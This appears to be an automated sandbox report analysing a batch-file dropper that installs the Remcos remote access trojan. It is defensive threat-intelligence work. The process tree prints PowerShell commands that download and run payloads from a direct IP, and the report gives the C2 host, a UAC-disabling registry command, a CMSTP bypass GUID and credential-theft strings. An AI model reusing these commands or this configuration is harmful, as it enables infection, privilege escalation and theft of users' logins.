Edit tour

Windows Analysis Report
55Ka50lb6Z.bat

Overview

General Information

Sample name:	55Ka50lb6Z.bat renamed because original name is a hash value
Original sample name:	4d8b2d19bdd29e6d89e0769cff9b0b48.bat
Analysis ID:	1518340
MD5:	4d8b2d19bdd29e6d89e0769cff9b0b48
SHA1:	07c4469751a5ddf43288b8ea7d32afce71783a2c
SHA256:	1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e
Tags:	batuser-abuse_ch
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

Found direct / indirect Syscall (likely to bypass EDR)

Found hidden mapped module (file has been removed from disk)

Injects code into the Windows Explorer (explorer.exe)

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Powershell drops PE file

Sigma detected: Powerup Write Hijack DLL

Sigma detected: Suspicious Invoke-WebRequest Execution

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Switches to a custom stack to bypass stack traces

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP

Sigma detected: Usage Of Web Request Commands And Cmdlets

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 3580 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\55Ka50lb6Z.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4304 cmdline: powershell wget http://172.94.3.25/ffo.bat -OutFile C:\Users\user\AppData\Roaming/ffo.bat MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 3968 cmdline: powershell wget http://172.94.3.25/hi.vbs -OutFile C:\Users\user\AppData\Roaming/hi.vbs MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 3428 cmdline: cmd /c C:\Users\user\AppData\Roaming/hi.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 948 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\hi.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 6512 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\ffo.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5936 cmdline: powershell wget http://172.94.3.25/AUGUST.exe -OutFile C:\Users\user\AppData\Roaming/AUGUST.exe MD5: 04029E121A0CFA5991749937DD22A1D9)

AUGUST.exe (PID: 3840 cmdline: C:\Users\user\AppData\Roaming/AUGUST.exe MD5: 25860926414BF43383246F7C773A8D6C)

DZIPR.exe (PID: 4568 cmdline: "C:\Users\user\DZIPR.exe" MD5: EC9CE1D67F98072281015C7726FBA245)

DZIPR.exe (PID: 5464 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)

cmd.exe (PID: 5476 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 3108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 4016 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

svchost.exe (PID: 3700 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

DZIPR.exe (PID: 6392 cmdline: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe MD5: EC9CE1D67F98072281015C7726FBA245)

cmd.exe (PID: 5900 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 4256 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

DZIPR.exe (PID: 508 cmdline: "C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe" MD5: EC9CE1D67F98072281015C7726FBA245)

cmd.exe (PID: 1488 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

explorer.exe (PID: 5972 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Version": "5.1.1 Pro", "Host:Port:Password": "fullimmersion777.com:8090:0", "Assigned name": "Back-September", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "hello.exe", "Startup value": "Disable", "Hide file": "Enable", "Mutex": "rimcsl-94LESJ", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\mdvbfllr	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\mdvbfllr	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Temp\mdvbfllr	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Users\user\AppData\Local\Temp\mdvbfllr	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
C:\Users\user\AppData\Local\Temp\mdvbfllr	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
C:\Users\user\AppData\Local\Temp\mdvbfllr	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
C:\Users\user\AppData\Local\Temp\yigmovm	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\yigmovm	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Temp\yigmovm	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Users\user\AppData\Local\Temp\yigmovm	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
C:\Users\user\AppData\Local\Temp\yigmovm	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
C:\Users\user\AppData\Local\Temp\yigmovm	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
C:\Users\user\AppData\Local\Temp\vqqcre	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\vqqcre	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
C:\Users\user\AppData\Local\Temp\vqqcre	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
C:\Users\user\AppData\Local\Temp\vqqcre	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aab8:$a1: Remcos restarted by watchdog! 0x6b030:$a3: %02i:%02i:%02i:%03i
C:\Users\user\AppData\Local\Temp\vqqcre	REMCOS_RAT_variants	unknown	unknown	0x64b0c:$str_a1: C:\Windows\System32\cmd.exe 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b7c:$str_b2: Executing file: 0x65bfc:$str_b3: GetDirectListeningPort 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65728:$str_b7: \update.vbs 0x64ba4:$str_b9: Downloaded file: 0x64b90:$str_b10: Downloading file: 0x64c34:$str_b12: Failed to upload file: 0x65bc4:$str_b13: StartForward 0x65be4:$str_b14: StopForward 0x65680:$str_b15: fso.DeleteFile " 0x65614:$str_b16: On Error Resume Next 0x656b0:$str_b17: fso.DeleteFolder " 0x64c24:$str_b18: Uploaded file: 0x64be4:$str_b19: Unable to delete: 0x65648:$str_b20: while fso.FileExists(" 0x650c1:$str_c0: [Firefox StoredLogins not found]
C:\Users\user\AppData\Local\Temp\vqqcre	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649f8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6498c:$s1: CoGetObject 0x649a0:$s1: CoGetObject 0x649bc:$s1: CoGetObject 0x6e95e:$s1: CoGetObject 0x6494c:$s2: Elevation:Administrator!new:
C:\Users\user\DZIPR.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 15 entries

Memory Dumps

Source	Rule	Description	Author	Strings
0000000F.00000000.2725735029.0000000000401000.00000020.00000001.01000000.00000006.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
0000001C.00000002.3213654065.0000000002F1B000.00000004.00000001.01000000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x14b8:$a1: Remcos restarted by watchdog! 0x1a30:$a3: %02i:%02i:%02i:%03i
0000001C.00000002.3213566358.0000000002F12000.00000008.00000001.01000000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000019.00000002.3213353580.0000000005BA0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6ab80:$a1: Remcos restarted by watchdog! 0x6b0f8:$a3: %02i:%02i:%02i:%03i
00000019.00000002.3213058682.00000000055C9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001B.00000002.3184641813.00000000029A9000.00000002.00000001.01000000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x134b8:$a1: Remcos restarted by watchdog! 0x13a30:$a3: %02i:%02i:%02i:%03i
00000011.00000002.3036624027.0000000004A1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000015.00000002.3185375853.0000000005C40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6ab80:$a1: Remcos restarted by watchdog! 0x6b0f8:$a3: %02i:%02i:%02i:%03i
00000017.00000002.3036637408.0000000004D6F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001C.00000002.3213999446.0000000004E2E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000001C.00000002.3213673292.0000000002F1F000.00000008.00000001.01000000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000F.00000002.2745152463.0000000003568000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000017.00000002.3036285925.0000000002C59000.00000002.00000001.01000000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x134b8:$a1: Remcos restarted by watchdog! 0x13a30:$a3: %02i:%02i:%02i:%03i
00000015.00000002.3184945002.00000000055E8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000003.2720616296.00000000026D1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000011.00000002.3037243948.0000000005420000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6ab80:$a1: Remcos restarted by watchdog! 0x6b0f8:$a3: %02i:%02i:%02i:%03i
0000001B.00000002.3185001626.0000000004BA2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: DZIPR.exe PID: 4568	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 5476	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: cmd.exe PID: 5476	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: cmd.exe PID: 5476	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 5476	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xd30b5:$a1: Remcos restarted by watchdog! 0xd360f:$a3: %02i:%02i:%02i:%03i 0xd3a3e:$a3: %02i:%02i:%02i:%03i
Process Memory Space: cmd.exe PID: 5900	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: cmd.exe PID: 5900	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: cmd.exe PID: 5900	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 5900	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xc2a1:$a1: Remcos restarted by watchdog! 0xc7fb:$a3: %02i:%02i:%02i:%03i 0xcc2a:$a3: %02i:%02i:%02i:%03i
Process Memory Space: explorer.exe PID: 4016	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: explorer.exe PID: 4016	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: explorer.exe PID: 4016	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: explorer.exe PID: 4016	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xfe7c4:$a1: Remcos restarted by watchdog! 0xfed1e:$a3: %02i:%02i:%02i:%03i 0xff14d:$a3: %02i:%02i:%02i:%03i
Process Memory Space: cmd.exe PID: 1488	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: cmd.exe PID: 1488	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: cmd.exe PID: 1488	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: cmd.exe PID: 1488	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x74d7d:$a1: Remcos restarted by watchdog! 0x752d7:$a3: %02i:%02i:%02i:%03i 0x75706:$a3: %02i:%02i:%02i:%03i
Process Memory Space: explorer.exe PID: 4256	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: explorer.exe PID: 4256	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: explorer.exe PID: 4256	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: explorer.exe PID: 4256	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x98dfa:$a1: Remcos restarted by watchdog! 0x99354:$a3: %02i:%02i:%02i:%03i 0x99783:$a3: %02i:%02i:%02i:%03i
Process Memory Space: explorer.exe PID: 5972	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: explorer.exe PID: 5972	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: explorer.exe PID: 5972	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: explorer.exe PID: 5972	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x1f1c2:$a1: Remcos restarted by watchdog! 0x1f71b:$a3: %02i:%02i:%02i:%03i 0x1fb52:$a3: %02i:%02i:%02i:%03i
Click to see the 52 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
27.2.explorer.exe.4bedb57.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
27.2.explorer.exe.4bedb57.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
23.2.explorer.exe.4dbab57.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
23.2.explorer.exe.4dbab57.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
25.2.cmd.exe.5ba00c8.7.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
25.2.cmd.exe.5ba00c8.7.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
25.2.cmd.exe.5ba00c8.7.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
25.2.cmd.exe.5ba00c8.7.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690b8:$a1: Remcos restarted by watchdog! 0x69630:$a3: %02i:%02i:%02i:%03i
25.2.cmd.exe.5ba00c8.7.unpack	REMCOS_RAT_variants	unknown	unknown	0x6310c:$str_a1: C:\Windows\System32\cmd.exe 0x63088:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63088:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63588:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63db8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6317c:$str_b2: Executing file: 0x641fc:$str_b3: GetDirectListeningPort 0x63ba8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d28:$str_b7: \update.vbs 0x631a4:$str_b9: Downloaded file: 0x63190:$str_b10: Downloading file: 0x63234:$str_b12: Failed to upload file: 0x641c4:$str_b13: StartForward 0x641e4:$str_b14: StopForward 0x63c80:$str_b15: fso.DeleteFile " 0x63c14:$str_b16: On Error Resume Next 0x63cb0:$str_b17: fso.DeleteFolder " 0x63224:$str_b18: Uploaded file: 0x631e4:$str_b19: Unable to delete: 0x63c48:$str_b20: while fso.FileExists(" 0x636c1:$str_c0: [Firefox StoredLogins not found]
25.2.cmd.exe.5ba00c8.7.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62ff8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f8c:$s1: CoGetObject 0x62fa0:$s1: CoGetObject 0x62fbc:$s1: CoGetObject 0x6cf5e:$s1: CoGetObject 0x62f4c:$s2: Elevation:Administrator!new:
17.2.cmd.exe.4a65b57.5.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
17.2.cmd.exe.4a65b57.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x1dcbe:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1dd49:$s1: CoGetObject 0x1dca2:$s2: Elevation:Administrator!new:
